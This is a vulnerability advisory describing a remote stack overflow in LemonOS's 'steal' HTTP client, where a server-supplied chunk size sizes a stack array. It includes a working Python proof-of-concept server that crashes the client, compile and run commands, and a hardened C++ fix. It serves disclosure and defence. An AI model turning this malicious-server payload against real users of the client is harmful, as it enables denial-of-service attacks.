Lemon OS | Remote stack overflow
Information
| Software Type | Operating System |
|---|---|
| Software Name | LemonOS |
| Affected Version | nightly-2024-07-12 |
| Software Vendor | LemonOS |
| Software Link | https://github.com/LemonOSProject/LemonOS |
| Severity | High |
| CVSS Score | 7.5 |
| CVE Link | CVE-2025-9001 |
| Affected Assets | 10+ |
| Date of Discovery | April 10th 2025 |
| PoC Exploit | https://github.com/LemonOSProject/LemonOS/issues/60 |
Description
This vulnerability was identified as a result of collaborative efforts between myself and 0xVpr: I identified the vulnerability and 0xVpr mitigated it by providing a fix.
This report details a stack overflow vulnerability in the steal HTTP client (a curl equivalent for LemonOS), identified during an analysis conducted on April 10, 2025. The vulnerability arises from the use of a variable-length array (VLA) in the `HTTPGet` function, specifically at line 361 of main.cpp, where `char recieveBuffer[chunkSize];` is declared. Because a VLA lives on the stack, whatever value ends up in `chunkSize` becomes the size of the function's stack frame.
The `chunkSize` value is controlled by an external HTTP server response (the chunk-size line of a chunked transfer encoding), allowing an attacker to trigger a crash or potentially escalate the impact with precise manipulation.
Reproduce
Download and put the following two files in the same directory:
- https://github.com/LemonOSProject/LemonOS/blob/master/Applications/Steal/main.cpp
- https://github.com/LemonOSProject/LemonOS/blob/master/LibLemon/include/Lemon/Core/URL.h
Compile the code:
```shell
g++ -g -o steal main.cpp -lssl -lcrypto
```
Create a Python server (save it as server.py) that responds to any incoming request with a 10MB chunk:
```python
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('127.0.0.1', 80))  # binding port 80 usually requires root
s.listen(1)
print("Listening on 127.0.0.1:80")
conn, addr = s.accept()
conn.recv(1024)  # read (and ignore) the client's request

# Chunked response with a single 10MB chunk; the chunk-size line is what
# steal uses to size its VLA.
response = b"HTTP/1.1 200 OK\r\nTransfer-Encoding: chunked\r\n\r\n"
chunk_size = 10485760  # 10MB
payload = b"A" * chunk_size
response += f"{hex(chunk_size)[2:]}".encode() + b"\r\n"  # chunk size in hex
response += payload + b"\r\n"
response += b"0\r\n\r\n"  # terminating zero-length chunk
conn.sendall(response)  # sendall(): a single send() may stop short of 10MB
conn.close()
s.close()
```
Ensure Python 3 is installed and then run this:
```shell
$ python3 server.py
```
Think of this as a normal server that makes a 10MB installer available to users when they request it.
Compile the steal binary:
```shell
g++ -g -o steal main.cpp -lssl -lcrypto
```
Run it by sending a request to the server with the steal binary:
```shell
./steal "127.0.0.1"
```
This triggers a segmentation fault and crashes the program.
For a more extensive & detailed proof of concept, see the issue I opened on Github:
https://github.com/LemonOSProject/LemonOS/issues/60
Mitigation
0xVpr has modified main.cpp and fixed the bug:
https://gist.github.com/0xHamy/f54f672ddf49e41e550350448e4c93a9
You can now run the same attack again, serving a chunk_size of 100MB (10x the amount used in the initial tests), and you will notice that steal no longer crashes.
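To show the VLA pattern described in the Description section next to a hardened replacement of the kind the Mitigation section refers to, here is an added example written for this write-up; it is neither the project's code nor 0xVpr's fix. `kMaxChunkSize`, `kRecvBufferSize`, `ByteSource` and the function names are assumptions, and the chunk-size parser is generalised to reject overlong and malformed size lines, not just the 10MB case from the PoC.

```cpp
#include <algorithm>
#include <cstddef>
#include <stdexcept>
#include <string>
#include <vector>
// Vulnerable pattern, reconstructed from the description above (not the project's code):
//   size_t chunkSize = strtoul(sizeLine, nullptr, 16); // taken from the server's response
//   char recieveBuffer[chunkSize];                      // VLA: the peer sizes our stack frame
// A size line of "a00000" (10 MB) exceeds the thread stack, so the first write faults.
constexpr size_t kMaxChunkSize = 16 * 1024 * 1024; // assumed policy cap on one chunk
constexpr size_t kRecvBufferSize = 64 * 1024;       // fixed, compile-time buffer size
static int hexValue(char c) {
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}
// Parses a chunked-encoding size line such as "a00000\r\n" or "1f;ext=1\r\n".
// Throws invalid_argument on a malformed line and length_error above kMaxChunkSize,
// checking before each multiply so the accumulator itself cannot wrap.
size_t parseChunkSize(const std::string& line) {
    size_t value = 0, i = 0;
    for (int d; i < line.size() && (d = hexValue(line[i])) >= 0; ++i) {
        if (value > (kMaxChunkSize >> 4)) throw std::length_error("chunk size too large");
        value = value * 16 + static_cast<size_t>(d);
    }
    if (i == 0) throw std::invalid_argument("chunk size line has no hex digits");
    if (value > kMaxChunkSize) throw std::length_error("chunk size too large");
    return value;
}
struct ByteSource { // constructed stand-in for a socket with a recv()-like interface
    std::string data; size_t pos = 0;
    size_t recv(char* buf, size_t len) {
        size_t n = std::min(len, data.size() - pos);
        std::copy_n(data.data() + pos, n, buf); pos += n; return n;
    }
};
// Drains one chunk of chunkSize bytes through the fixed buffer, appending to out.
// Returns the bytes actually read; fewer than chunkSize means the peer closed early.
size_t receiveChunk(ByteSource& src, size_t chunkSize, std::vector<char>& out) {
    char buffer[kRecvBufferSize]; // size does not depend on anything the peer sent
    size_t total = 0;
    while (total < chunkSize) {
        size_t n = src.recv(buffer, std::min(kRecvBufferSize, chunkSize - total));
        if (n == 0) break;
        out.insert(out.end(), buffer, buffer + n);
        total += n;
    }
    return total;
}
```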
Proof of Concept (PoC) Video
No PoC video available.
Posted on: May 23, 2025 01:10 AM